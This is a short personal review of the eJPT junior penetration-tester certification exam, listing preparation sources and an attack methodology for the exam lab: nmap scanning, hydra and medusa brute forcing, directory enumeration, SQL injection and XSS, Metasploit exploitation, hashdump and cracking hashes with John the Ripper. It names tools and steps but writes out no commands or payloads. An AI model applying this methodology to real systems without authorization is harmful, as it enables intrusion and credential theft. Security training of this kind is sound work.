👩‍💻eJPT exam - My review

(eLearnSecurity Junior Penetration Tester Certification)

If you are a pentester by role, this hands-on exam is a good one to start with. For a first-timer on a hands-on exam, this would be an eye opener for Blackbox penetration testing.

✍🏻Steps to prepare

Like in every blog that mentions about the eJPT exam, INE’s Penetration Testing Student Learning path is the go to. And of course, do not underestimate the power of OSINT.

📃Student material provided in the exam: There are 3 materials provided 👍

  1. The exam instructions guide : This contains the target and VPN instructions

  2. The users list that you could leverage for your attacks

  3. The password list that you could use for your attacks

🤯My methodology

Recon - Use nmap scripts for host discovery. Also, note that the results might mislead you because of hidden secret servers which is accessible only when you start pivoting inside the network.

Tip: Document everything. Create different notes for each hosts to store the recon information you discovered. Always run wireshark in the background to analyse your traffic.

Thorough port and version scan is necessary to determine the open ports, and vulnerable versions on a target.

Tools used : nmap

Bruteforce attacks to the targets may be a turning point to get access to a target. For bruteforcing, use the users and password wordlists provided in the exam material. Connect to server GUI with tools.

Tools used : hydra, medusa, FileZilla

Enumeration Tools used : Dirb, gobuster

Web application attacks to know 👏

  1. Sql injection (all types and techniques - Bypass login, enumerate tables and databases using SQLmap)

  2. Cross Site Scripting (All types) - Keep the Javascript codes handy to perform different XXS attacks.

Rest of the web app based quiz questions are based on the enumeration. The more you enumerate, the more you are closer to the answers.

Use metasploit to exploit the vulnerable machines to get into it and the shell will follow you automatically. Once you have access to the machine, hashdump anywhere possible. Boom! You have all the users and their password hashes.

To crack the password hashes, use John the Ripper and the well-know rockyou.txt wordlist.

You are all good to go! All the very best 👍